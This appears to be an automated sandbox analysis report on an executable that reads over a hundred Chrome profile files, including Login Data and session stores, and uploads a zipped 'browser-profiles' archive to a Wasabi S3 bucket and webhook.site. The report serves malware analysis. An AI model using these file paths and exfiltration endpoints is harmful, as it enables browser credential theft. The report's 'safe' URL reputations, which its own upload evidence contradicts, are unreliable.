Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteDataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust TokensJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action PredictorJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SharedStorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340965317813669Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited LinksJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigratedJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsStateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340965342984957Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation DatabaseJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340965343135326Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340965317929160Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ShortcutsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredAppsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.logJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		1
OS Credential Dumping		11
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager21
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
https://www.ecosia.org/newtab/0%URL Reputationsafe
https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
https://drive.google.com/drive/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240822093937-19882742-CC56-1A59-970%Avira URL Cloudsafe
http://s3.amazonaws.com/doc/2006-03-01/B0%Avira URL Cloudsafe
https://docs.google.com/presentation/J0%Avira URL Cloudsafe
https://www.youtube.com/:0%Avira URL Cloudsafe
https://docs.google.com/document/J0%Avira URL Cloudsafe
https://mail.google.com/mail/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
https://mail.google.com/mail/?usp=installed_webapp0%Avira URL Cloudsafe
http://s3.amazonaws.com/doc/2006-03-01/0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
https://docs.google.com/document/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
https://mail.google.com/mail/:0%Avira URL Cloudsafe
https://docs.google.com/presentation/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
https://sandbox.google.com/payments/v4/js/integrator.js0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=enWeb0%Avira URL Cloudsafe
https://docs.google.com/presentation/:0%Avira URL Cloudsafe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de50%Avira URL Cloudsafe
https://docs.google.com/document/:0%Avira URL Cloudsafe
https://docs.google.com/spreadsheets/J0%Avira URL Cloudsafe
https://www.google.com0%Avira URL Cloudsafe
https://docs.google.com/spreadsheets/?usp=installed_webapp0%Avira URL Cloudsafe
https://mail.google.com/mail/J0%Avira URL Cloudsafe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploads=0%Avira URL Cloudsafe
https://chrome.google.com0%Avira URL Cloudsafe
https://www.youtube.com/?feature=ytca0%Avira URL Cloudsafe
https://docs.google.com/spreadsheets/:0%Avira URL Cloudsafe
https://drive.google.com/?lfhs=20%Avira URL Cloudsafe
https://www.youtube.com/s/notifications/manifest/cr_install.html0%Avira URL Cloudsafe
https://drive.google.com/:0%Avira URL Cloudsafe
https://www.youtube.com/J0%Avira URL Cloudsafe
https://drive.google.com/J0%Avira URL Cloudsafe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
https://payments.google.com/payments/v4/js/integrator.js0%Avira URL Cloudsafe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8C0%Avira URL Cloudsafe
https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240%Avira URL Cloudsafe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd00%Avira URL Cloudsafe
https://csp.withgoogle.com/csp/report-to/chromewebstore0%Avira URL Cloudsafe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5Temp0%Avira URL Cloudsafe
https://docs.google.com/presentation/?usp=installed_webapp0%Avira URL Cloudsafe
http://s3.amazonaws.com/doc/2006-03-01/Created0%Avira URL Cloudsafe
https://clients2.googleusercontent.com0%Avira URL Cloudsafe
https://docs.google.com/document/?usp=installed_webapp0%Avira URL Cloudsafe
https://www.google.com/0%Avira URL Cloudsafe
https://csp.withgoogle.com/csp/report-to/gws/none0%Avira URL Cloudsafe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploadId=Ee0L69Fsbnl2DIafL29HP6-TgJNxOOr1DYqImM_STgfVcBDub2OcNG-UV5TvF65k7r3QeCTgxwqK-iVhXES85dRSMEQLe1J0NQHUVQqfbBqcsNqUTvcAaqJe3k7pKnyq0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ap-southeast-1.wasabisys.com
154.18.200.102
truefalse
    		unknown
    webhook.site
    		46.4.105.116
    		truefalse
      		unknown
      s3.ap-southeast-1.wasabisys.com
      		unknown
      		unknownfalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5false
        • Avira URL Cloud: safe
        		unknown
        https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploads=false
        • Avira URL Cloud: safe
        		unknown
        https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploadId=Ee0L69Fsbnl2DIafL29HP6-TgJNxOOr1DYqImM_STgfVcBDub2OcNG-UV5TvF65k7r3QeCTgxwqK-iVhXES85dRSMEQLe1J0NQHUVQqfbBqcsNqUTvcAaqJe3k7pKnyqfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://mail.google.com/mail/?usp=installed_webappfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://duckduckgo.com/ac/?q=file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        http://s3.amazonaws.com/doc/2006-03-01/Bfile.exe, 00000000.00000002.1442531637.00000000024A8000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://mail.google.com/mail/installwebapp?usp=chrome_defaultfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240822093937-19882742-CC56-1A59-97file.exe, 00000000.00000002.1442531637.00000000024D8000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/presentation/Jfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/document/Jfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/drive/installwebapp?usp=chrome_defaultfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.youtube.com/:file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        http://s3.amazonaws.com/doc/2006-03-01/file.exefalse
        • Avira URL Cloud: safe
        		unknown
        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • URL Reputation: safe
        		unknown
        https://mail.google.com/mail/:file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
